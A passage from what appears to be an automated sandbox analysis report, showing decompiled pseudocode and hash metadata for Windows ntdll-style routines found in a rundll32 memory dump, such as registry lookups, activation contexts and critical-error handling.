                                                                                                                				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
                                                                                                                				 *(_t83 - 4) =  *(_t83 - 4) & 0;
                                                                                                                				_t7 = _t55 + 8; // 0x8
                                                                                                                				_t57 = 6;
                                                                                                                				memcpy(_t7, _t79, _t57 << 2);
                                                                                                                				_t80 = 0xfffffffe;
                                                                                                                				 *(_t83 - 4) = _t80;
                                                                                                                				if(0 < 0) {
                                                                                                                					L14:
                                                                                                                					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                                                                                                					L20:
                                                                                                                					L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
                                                                                                                					_t39 = _t81;
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
                                                                                                                					_t81 = 0xc000007b;
                                                                                                                					goto L20;
                                                                                                                				}
                                                                                                                				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
                                                                                                                					_t59 =  *((intOrPtr*)(_t83 + 8));
                                                                                                                					_t45 =  *_t59;
                                                                                                                					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
                                                                                                                					 *_t59 = _t45 + 1;
                                                                                                                					L6:
                                                                                                                					 *(_t83 - 4) = 1;
                                                                                                                					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
                                                                                                                					 *(_t83 - 4) = _t80;
                                                                                                                					if(_t68 < 0) {
                                                                                                                						_t82 =  *((intOrPtr*)(_t83 + 0xc));
                                                                                                                						if(_t82 == 0) {
                                                                                                                							goto L14;
                                                                                                                						}
                                                                                                                						asm("btr eax, ecx");
                                                                                                                						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                                                                                                						if( *_t82 != 0) {
                                                                                                                							 *0x44f7b10 =  *0x44f7b10 - 8;
                                                                                                                						}
                                                                                                                						goto L20;
                                                                                                                					}
                                                                                                                					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
                                                                                                                					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
                                                                                                                					_t51 =  *0x44f536c; // 0x360ca0
                                                                                                                					if( *_t51 != 0x44f5368) {
                                                                                                                						_push(3);
                                                                                                                						asm("int 0x29");
                                                                                                                						goto L14;
                                                                                                                					}
                                                                                                                					 *_t55 = 0x44f5368;
                                                                                                                					 *((intOrPtr*)(_t55 + 4)) = _t51;
                                                                                                                					 *_t51 = _t55;
                                                                                                                					 *0x44f536c = _t55;
                                                                                                                					_t52 =  *((intOrPtr*)(_t83 + 0x10));
                                                                                                                					if(_t52 != 0) {
                                                                                                                						 *_t52 = _t55;
                                                                                                                					}
                                                                                                                					_t39 = 0;
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                				_t77 =  *((intOrPtr*)(_t83 + 8));
                                                                                                                				_t68 = E0443A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
                                                                                                                				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
                                                                                                                				if(_t68 < 0) {
                                                                                                                					goto L14;
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
                                                                                                                				goto L6;
                                                                                                                			}

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: -5
                                                                                                                • API String ID: 0-2460486224
                                                                                                                • Opcode ID: ef97d5571d4b71d0e821d525609f265453dded6442cc143b3c297b25b8e59f61
                                                                                                                • Instruction ID: b296a3c1a3ebf609ce6fb139877c8039fab2678959f36fb719b8cf786b9b617b
                                                                                                                • Opcode Fuzzy Hash: ef97d5571d4b71d0e821d525609f265453dded6442cc143b3c297b25b8e59f61
                                                                                                                • Instruction Fuzzy Hash: C34167B5A40205DFEF14CF58C980B99BBF1FB49705F1980AAE844AB345D778B902CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 72%
                                                                                                                			E04483884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                                                                                                				char _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				intOrPtr* _v16;
                                                                                                                				char* _v20;
                                                                                                                				short _v22;
                                                                                                                				char _v24;
                                                                                                                				intOrPtr _t38;
                                                                                                                				short _t40;
                                                                                                                				short _t41;
                                                                                                                				void* _t44;
                                                                                                                				intOrPtr _t47;
                                                                                                                				void* _t48;
                                                                                                                
                                                                                                                				_v16 = __edx;
                                                                                                                				_t40 = 0x14;
                                                                                                                				_v24 = _t40;
                                                                                                                				_t41 = 0x16;
                                                                                                                				_v22 = _t41;
                                                                                                                				_t38 = 0;
                                                                                                                				_v12 = __ecx;
                                                                                                                				_push( &_v8);
                                                                                                                				_push(0);
                                                                                                                				_push(0);
                                                                                                                				_push(2);
                                                                                                                				_t43 =  &_v24;
                                                                                                                				_v20 = L"BinaryName";
                                                                                                                				_push( &_v24);
                                                                                                                				_push(__ecx);
                                                                                                                				_t47 = 0;
                                                                                                                				_t48 = E04449650();
                                                                                                                				if(_t48 >= 0) {
                                                                                                                					_t48 = 0xc000090b;
                                                                                                                				}
                                                                                                                				if(_t48 != 0xc0000023) {
                                                                                                                					_t44 = 0;
                                                                                                                					L13:
                                                                                                                					if(_t48 < 0) {
                                                                                                                						L16:
                                                                                                                						if(_t47 != 0) {
                                                                                                                							L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                                                                                                                						}
                                                                                                                						L18:
                                                                                                                						return _t48;
                                                                                                                					}
                                                                                                                					 *_v16 = _t38;
                                                                                                                					 *_a4 = _t47;
                                                                                                                					goto L18;
                                                                                                                				}
                                                                                                                				_t47 = L04424620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                                                                                				if(_t47 != 0) {
                                                                                                                					_push( &_v8);
                                                                                                                					_push(_v8);
                                                                                                                					_push(_t47);
                                                                                                                					_push(2);
                                                                                                                					_push( &_v24);
                                                                                                                					_push(_v12);
                                                                                                                					_t48 = E04449650();
                                                                                                                					if(_t48 < 0) {
                                                                                                                						_t44 = 0;
                                                                                                                						goto L16;
                                                                                                                					}
                                                                                                                					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                                                                                                                						_t48 = 0xc000090b;
                                                                                                                					}
                                                                                                                					_t44 = 0;
                                                                                                                					if(_t48 < 0) {
                                                                                                                						goto L16;
                                                                                                                					} else {
                                                                                                                						_t17 = _t47 + 0xc; // 0xc
                                                                                                                						_t38 = _t17;
                                                                                                                						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                                                                                                                							_t48 = 0xc000090b;
                                                                                                                						}
                                                                                                                						goto L13;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t48 = _t48 + 0xfffffff4;
                                                                                                                				goto L18;
                                                                                                                			}
                                                                                                                0x044838f0
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: BinaryName
                                                                                                                • API String ID: 2994545307-215506332
                                                                                                                • Opcode ID: cf1be02f46021c287cfd621da44630fc849f37a709042d3a4013b05930bc5d75
                                                                                                                • Instruction ID: 7f2a2f895168738b1cb43da8beba035f1d8758543e6aec8a159990a5f1ed73f7
                                                                                                                • Opcode Fuzzy Hash: cf1be02f46021c287cfd621da44630fc849f37a709042d3a4013b05930bc5d75
                                                                                                                • Instruction Fuzzy Hash: A731D472901519AFEF25EE59C945D6FB774EB80B20F01416EED15A7790E632BE00CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 33%
                                                                                                                			E0443D294(void* __ecx, char __edx, void* __eflags) {
                                                                                                                				signed int _v8;
                                                                                                                				char _v52;
                                                                                                                				signed int _v56;
                                                                                                                				signed int _v60;
                                                                                                                				intOrPtr _v64;
                                                                                                                				char* _v68;
                                                                                                                				intOrPtr _v72;
                                                                                                                				char _v76;
                                                                                                                				signed int _v84;
                                                                                                                				intOrPtr _v88;
                                                                                                                				char _v92;
                                                                                                                				intOrPtr _v96;
                                                                                                                				intOrPtr _v100;
                                                                                                                				char _v104;
                                                                                                                				char _v105;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t35;
                                                                                                                				char _t38;
                                                                                                                				signed int _t40;
                                                                                                                				signed int _t44;
                                                                                                                				signed int _t52;
                                                                                                                				void* _t53;
                                                                                                                				void* _t55;
                                                                                                                				void* _t61;
                                                                                                                				intOrPtr _t62;
                                                                                                                				void* _t64;
                                                                                                                				signed int _t65;
                                                                                                                				signed int _t66;
                                                                                                                
                                                                                                                				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                                                                                                                				_v8 =  *0x44fd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                                                                                                                				_v105 = __edx;
                                                                                                                				_push( &_v92);
                                                                                                                				_t52 = 0;
                                                                                                                				_push(0);
                                                                                                                				_push(0);
                                                                                                                				_push( &_v104);
                                                                                                                				_push(0);
                                                                                                                				_t59 = __ecx;
                                                                                                                				_t55 = 2;
                                                                                                                				if(E04424120(_t55, __ecx) < 0) {
                                                                                                                					_t35 = 0;
                                                                                                                					L8:
                                                                                                                					_pop(_t61);
                                                                                                                					_pop(_t64);
                                                                                                                					_pop(_t53);
                                                                                                                					return E0444B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                                                                                                                				}
                                                                                                                				_v96 = _v100;
                                                                                                                				_t38 = _v92;
                                                                                                                				if(_t38 != 0) {
                                                                                                                					_v104 = _t38;
                                                                                                                					_v100 = _v88;
                                                                                                                					_t40 = _v84;
                                                                                                                				} else {
                                                                                                                					_t40 = 0;
                                                                                                                				}
                                                                                                                				_v72 = _t40;
                                                                                                                				_v68 =  &_v104;
                                                                                                                				_push( &_v52);
                                                                                                                				_v76 = 0x18;
                                                                                                                				_push( &_v76);
                                                                                                                				_v64 = 0x40;
                                                                                                                				_v60 = _t52;
                                                                                                                				_v56 = _t52;
                                                                                                                				_t44 = E044498D0();
                                                                                                                				_t62 = _v88;
                                                                                                                				_t65 = _t44;
                                                                                                                				if(_t62 != 0) {
                                                                                                                					asm("lock xadd [edi], eax");
                                                                                                                					if((_t44 | 0xffffffff) != 0) {
                                                                                                                						goto L4;
                                                                                                                					}
                                                                                                                					_push( *((intOrPtr*)(_t62 + 4)));
                                                                                                                					E044495D0();
                                                                                                                					L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                                                                                                                					goto L4;
                                                                                                                				} else {
                                                                                                                					L4:
                                                                                                                					L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                                                                                                                					if(_t65 >= 0) {
                                                                                                                						_t52 = 1;
                                                                                                                					} else {
                                                                                                                						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                                                                                                                							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t35 = _t52;
                                                                                                                					goto L8;
                                                                                                                				}
                                                                                                                			}


                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @
                                                                                                                • API String ID: 0-2766056989
                                                                                                                • Opcode ID: 235270981aa0525043083231c16ab95c4d5a641ebd109658b1be9d2cf8ab02b7
                                                                                                                • Instruction ID: 42afd35da4d2880ca3250afa9431a336d82e0e294c9d7db7d732cfc0e956d359
                                                                                                                • Opcode Fuzzy Hash: 235270981aa0525043083231c16ab95c4d5a641ebd109658b1be9d2cf8ab02b7
                                                                                                                • Instruction Fuzzy Hash: A13197F19083059FDB21DF29C98095BBBE8EBC9B54F40052FF59593211EA38ED05DB92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 72%
                                                                                                                			E04411B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				char _v16;
                                                                                                                				intOrPtr* _t26;
                                                                                                                				intOrPtr _t29;
                                                                                                                				void* _t30;
                                                                                                                				signed int _t31;
                                                                                                                
                                                                                                                				_t27 = __ecx;
                                                                                                                				_t29 = __edx;
                                                                                                                				_t31 = 0;
                                                                                                                				_v8 = __edx;
                                                                                                                				if(__edx == 0) {
                                                                                                                					L18:
                                                                                                                					_t30 = 0xc000000d;
                                                                                                                					goto L12;
                                                                                                                				} else {
                                                                                                                					_t26 = _a4;
                                                                                                                					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                                                                                                                						goto L18;
                                                                                                                					} else {
                                                                                                                						E0444BB40(__ecx,  &_v16, __ecx);
                                                                                                                						_push(_t26);
                                                                                                                						_push(0);
                                                                                                                						_push(0);
                                                                                                                						_push(_t29);
                                                                                                                						_push( &_v16);
                                                                                                                						_t30 = E0444A9B0();
                                                                                                                						if(_t30 >= 0) {
                                                                                                                							_t19 =  *_t26;
                                                                                                                							if( *_t26 != 0) {
                                                                                                                								goto L7;
                                                                                                                							} else {
                                                                                                                								 *_a8 =  *_a8 & 0;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							if(_t30 != 0xc0000023) {
                                                                                                                								L9:
                                                                                                                								_push(_t26);
                                                                                                                								_push( *_t26);
                                                                                                                								_push(_t31);
                                                                                                                								_push(_v8);
                                                                                                                								_push( &_v16);
                                                                                                                								_t30 = E0444A9B0();
                                                                                                                								if(_t30 < 0) {
                                                                                                                									L12:
                                                                                                                									if(_t31 != 0) {
                                                                                                                										L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                                                                                                                									}
                                                                                                                								} else {
                                                                                                                									 *_a8 = _t31;
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								_t19 =  *_t26;
                                                                                                                								if( *_t26 == 0) {
                                                                                                                									_t31 = 0;
                                                                                                                								} else {
                                                                                                                									L7:
                                                                                                                									_t31 = L04424620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                                                                                                                								}
                                                                                                                								if(_t31 == 0) {
                                                                                                                									_t30 = 0xc0000017;
                                                                                                                								} else {
                                                                                                                									goto L9;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t30;
                                                                                                                			}










                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: WindowsExcludedProcs
                                                                                                                • API String ID: 0-3583428290
                                                                                                                • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                                • Instruction ID: 078463c7cb0549578af5038639a31185d9b5e4bfcd8a4b9cc60327d634d0f48f
                                                                                                                • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                                • Instruction Fuzzy Hash: 1C21D336600268ABEF319F958940F5BB7A9EB88754F054427EA059B310E630F90197A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0442F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                				intOrPtr _t13;
                                                                                                                				intOrPtr _t14;
                                                                                                                				signed int _t16;
                                                                                                                				signed char _t17;
                                                                                                                				intOrPtr _t19;
                                                                                                                				intOrPtr _t21;
                                                                                                                				intOrPtr _t23;
                                                                                                                				intOrPtr* _t25;
                                                                                                                
                                                                                                                				_t25 = _a8;
                                                                                                                				_t17 = __ecx;
                                                                                                                				if(_t25 == 0) {
                                                                                                                					_t19 = 0xc00000f2;
                                                                                                                					L8:
                                                                                                                					return _t19;
                                                                                                                				}
                                                                                                                				if((__ecx & 0xfffffffe) != 0) {
                                                                                                                					_t19 = 0xc00000ef;
                                                                                                                					goto L8;
                                                                                                                				}
                                                                                                                				_t19 = 0;
                                                                                                                				 *_t25 = 0;
                                                                                                                				_t21 = 0;
                                                                                                                				_t23 = "Actx ";
                                                                                                                				if(__edx != 0) {
                                                                                                                					if(__edx == 0xfffffffc) {
                                                                                                                						L21:
                                                                                                                						_t21 = 0x200;
                                                                                                                						L5:
                                                                                                                						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                                                                                                                						 *_t25 = _t13;
                                                                                                                						L6:
                                                                                                                						if(_t13 == 0) {
                                                                                                                							if((_t17 & 0x00000001) != 0) {
                                                                                                                								 *_t25 = _t23;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L7:
                                                                                                                						goto L8;
                                                                                                                					}
                                                                                                                					if(__edx == 0xfffffffd) {
                                                                                                                						 *_t25 = _t23;
                                                                                                                						_t13 = _t23;
                                                                                                                						goto L6;
                                                                                                                					}
                                                                                                                					_t13 =  *((intOrPtr*)(__edx + 0x10));
                                                                                                                					 *_t25 = _t13;
                                                                                                                					L14:
                                                                                                                					if(_t21 == 0) {
                                                                                                                						goto L6;
                                                                                                                					}
                                                                                                                					goto L5;
                                                                                                                				}
                                                                                                                				_t14 = _a4;
                                                                                                                				if(_t14 != 0) {
                                                                                                                					_t16 =  *(_t14 + 0x14) & 0x00000007;
                                                                                                                					if(_t16 <= 1) {
                                                                                                                						_t21 = 0x1f8;
                                                                                                                						_t13 = 0;
                                                                                                                						goto L14;
                                                                                                                					}
                                                                                                                					if(_t16 == 2) {
                                                                                                                						goto L21;
                                                                                                                					}
                                                                                                                					if(_t16 != 4) {
                                                                                                                						_t19 = 0xc00000f0;
                                                                                                                						goto L7;
                                                                                                                					}
                                                                                                                					_t13 = 0;
                                                                                                                					goto L6;
                                                                                                                				} else {
                                                                                                                					_t21 = 0x1f8;
                                                                                                                					goto L5;
                                                                                                                				}
                                                                                                                			}












                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Actx
                                                                                                                • API String ID: 0-89312691
                                                                                                                • Opcode ID: 0a4c6b78eff2ea8af090409ff3d92593bbbb1cc06db6a42b04532c38f3bcfed0
                                                                                                                • Instruction ID: f9ca5774907e0bdd82118a0a18bf99e6315cb302569736240609b5795a7fa088
                                                                                                                • Opcode Fuzzy Hash: 0a4c6b78eff2ea8af090409ff3d92593bbbb1cc06db6a42b04532c38f3bcfed0
                                                                                                                • Instruction Fuzzy Hash: 0F117F393046228BEF344E19879077772B5ABC5764FE4453BE861CB391E670F84AB340
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 71%
                                                                                                                			E044B8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				intOrPtr _t35;
                                                                                                                				void* _t41;
                                                                                                                
                                                                                                                				_t40 = __esi;
                                                                                                                				_t39 = __edi;
                                                                                                                				_t38 = __edx;
                                                                                                                				_t35 = __ecx;
                                                                                                                				_t34 = __ebx;
                                                                                                                				_push(0x74);
                                                                                                                				_push(0x44e0d50);
                                                                                                                				E0445D0E8(__ebx, __edi, __esi);
                                                                                                                				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                                                                                                                				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                                                                                                                				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                                                                                                                					E04495720(0x65, 0, "Critical error detected %lx\n", _t35);
                                                                                                                					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                                                                                                                						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                                                                                                						asm("int3");
                                                                                                                						 *(_t41 - 4) = 0xfffffffe;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				 *(_t41 - 4) = 1;
                                                                                                                				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                                                                                                                				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                                                                                                                				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                                                                                                                				 *((intOrPtr*)(_t41 - 0x64)) = L0445DEF0;
                                                                                                                				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                                                                                                                				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                                                                                                                				_push(_t41 - 0x70);
                                                                                                                				L0445DEF0(1, _t38);
                                                                                                                				 *(_t41 - 4) = 0xfffffffe;
                                                                                                                				return E0445D130(_t34, _t39, _t40);
                                                                                                                			}






                                                                                                                Strings
                                                                                                                • Critical error detected %lx, xrefs: 044B8E21
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Critical error detected %lx
                                                                                                                • API String ID: 0-802127002
                                                                                                                • Opcode ID: 3c3c52744564431ac9ea6874ccfa3b063badd3f643411c49e5fd354884d4235c
                                                                                                                • Instruction ID: b3dcc0a5cedb19d6918d2a1e5a73f25f0490871a1605ebb0171e13216be17466
                                                                                                                • Opcode Fuzzy Hash: 3c3c52744564431ac9ea6874ccfa3b063badd3f643411c49e5fd354884d4235c
                                                                                                                • Instruction Fuzzy Hash: 211179B1D00348DBEF25DFA989057DDBBB4AB04314F24825ED569AB392C3346602CF64
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0449FF60
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                                                • API String ID: 0-1911121157
                                                                                                                • Opcode ID: 27713b6ae5ffcafb23c3d9bf2f005309b5c8fabbc6f84f2399f3cdb92837692b
                                                                                                                • Instruction ID: d2e667d3529b36d4ebb9cf41ceeda2dffe916baa2ec3628cfa0129522fbe1492
                                                                                                                • Opcode Fuzzy Hash: 27713b6ae5ffcafb23c3d9bf2f005309b5c8fabbc6f84f2399f3cdb92837692b
                                                                                                                • Instruction Fuzzy Hash: 6C118E71910144EFEF12DF50C948F997BB1FF08709F24805AE508972A2C739BD54DB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 88%
                                                                                                                			E044D5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				signed int _t296;
                                                                                                                				signed char _t298;
                                                                                                                				signed int _t301;
                                                                                                                				signed int _t306;
                                                                                                                				signed int _t310;
                                                                                                                				signed char _t311;
                                                                                                                				intOrPtr _t312;
                                                                                                                				signed int _t313;
                                                                                                                				void* _t327;
                                                                                                                				signed int _t328;
                                                                                                                				intOrPtr _t329;
                                                                                                                				intOrPtr _t333;
                                                                                                                				signed char _t334;
                                                                                                                				signed int _t336;
                                                                                                                				void* _t339;
                                                                                                                				signed int _t340;
                                                                                                                				signed int _t356;
                                                                                                                				signed int _t362;
                                                                                                                				short _t367;
                                                                                                                				short _t368;
                                                                                                                				short _t373;
                                                                                                                				signed int _t380;
                                                                                                                				void* _t382;
                                                                                                                				short _t385;
                                                                                                                				signed short _t392;
                                                                                                                				signed char _t393;
                                                                                                                				signed int _t395;
                                                                                                                				signed char _t397;
                                                                                                                				signed int _t398;
                                                                                                                				signed short _t402;
                                                                                                                				void* _t406;
                                                                                                                				signed int _t412;
                                                                                                                				signed char _t414;
                                                                                                                				signed short _t416;
                                                                                                                				signed int _t421;
                                                                                                                				signed char _t427;
                                                                                                                				intOrPtr _t434;
                                                                                                                				signed char _t435;
                                                                                                                				signed int _t436;
                                                                                                                				signed int _t442;
                                                                                                                				signed int _t446;
                                                                                                                				signed int _t447;
                                                                                                                				signed int _t451;
                                                                                                                				signed int _t453;
                                                                                                                				signed int _t454;
                                                                                                                				signed int _t455;
                                                                                                                				intOrPtr _t456;
                                                                                                                				intOrPtr* _t457;
                                                                                                                				short _t458;
                                                                                                                				signed short _t462;
                                                                                                                				signed int _t469;
                                                                                                                				intOrPtr* _t474;
                                                                                                                				signed int _t475;
                                                                                                                				signed int _t479;
                                                                                                                				signed int _t480;
                                                                                                                				signed int _t481;
                                                                                                                				short _t485;
                                                                                                                				signed int _t491;
                                                                                                                				signed int* _t494;
                                                                                                                				signed int _t498;
                                                                                                                				signed int _t505;
                                                                                                                				intOrPtr _t506;
                                                                                                                				signed short _t508;
                                                                                                                				signed int _t511;
                                                                                                                				void* _t517;
                                                                                                                				signed int _t519;
                                                                                                                				signed int _t522;
                                                                                                                				void* _t523;
                                                                                                                				signed int _t524;
                                                                                                                				void* _t528;
                                                                                                                				signed int _t529;
                                                                                                                
                                                                                                                				_push(0xd4);
                                                                                                                				_push(0x44e1178);
                                                                                                                				E0445D0E8(__ebx, __edi, __esi);
                                                                                                                				_t494 = __edx;
                                                                                                                				 *(_t528 - 0xcc) = __edx;
                                                                                                                				_t511 = __ecx;
                                                                                                                				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                                                                                                                				 *(_t528 - 0xbc) = __ecx;
                                                                                                                				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                                                                                                                				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                                                                                                                				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                                                                                                                				_t427 = 0;
                                                                                                                				 *(_t528 - 0x74) = 0;
                                                                                                                				 *(_t528 - 0x9c) = 0;
                                                                                                                				 *(_t528 - 0x84) = 0;
                                                                                                                				 *(_t528 - 0xac) = 0;
                                                                                                                				 *(_t528 - 0x88) = 0;
                                                                                                                				 *(_t528 - 0xa8) = 0;
                                                                                                                				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                                                                                                                				if( *(_t528 + 0x1c) <= 0x80) {
                                                                                                                					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                                                                                                                					if(__eflags != 0) {
